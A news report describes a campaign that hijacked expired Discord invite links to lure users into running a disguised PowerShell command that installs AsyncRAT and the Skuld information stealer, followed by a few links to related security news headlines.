Hackers exploit Discord invite system to spread info-stealers and RATs

Hackers exploit Discord invite system to spread info-stealers and RATs

A new malicious campaign is abusing a loophole in Discord’s invitation system to distribute malware, including the AsyncRAT remote access trojan and a modified variant of the Skuld information stealer, according to cybersecurity researchers at c.

The attackers hijacked expired or deleted vanity invite links on Discord, redirecting users from legitimate communities to malicious servers under their control.

Once inside the rogue server, users are prompted to complete a so-called ‘verification’ step. In reality, this is a phishing attempt using the ClickFix tactic. Victims are tricked into copying and running a malicious PowerShell command disguised as a verification process. The command initiates a stealthy infection chain, eventually delivering AsyncRAT and the Skuld Stealer.

AsyncRAT enables full remote control over an infected device and uses a technique called a ‘dead drop resolver’ to connect to its command-and-control (C2) server via Pastebin. Meanwhile, Golang-based Skuld harvests sensitive data from browsers, Discord, gaming platforms, and crypto wallets such as Exodus and Atomic. It even replaces legitimate app files with trojanized versions downloaded from GitHub using the wallet injection technique.

The campaign’s infrastructure leverages trusted cloud services like GitHub, Pastebin, Bitbucket, and Discord itself, allowing it to evade traditional security detection.

Discord has since disabled the malicious bot, disrupting the attack chain. However, Check Point also discovered a parallel operation by the same threat actor involving a fake game hacktool, which was downloaded over 350 times, that delivers the same loader.

Victims appear to be largely located in the US, Vietnam, France, Germany, Slovakia, Austria, the Netherlands, and the UK.

Back to the list

Latest Posts

Researchers caught embedding hidden AI prompts to sway research reviewers

Researchers caught embedding hidden AI prompts to sway research reviewers

The investigation analyzed English-language preprints published on the research platform arXiv and found concealed AI instructions in 17 papers.
7 July 2025
Brazilian programmer arrested for role in $185 million bank hack

Brazilian programmer arrested for role in $185 million bank hack

João Nazareno Roque, a junior back-end developer at C&M, was allegedly recruited by hackers in a bar in São Paulo.
7 July 2025
APT36 cyber-espionage campaign targeting Indian defense sector via BOSS Linux

APT36 cyber-espionage campaign targeting Indian defense sector via BOSS Linux

More recently, APT36 has shifted its focus to Linux-based environments.
7 July 2025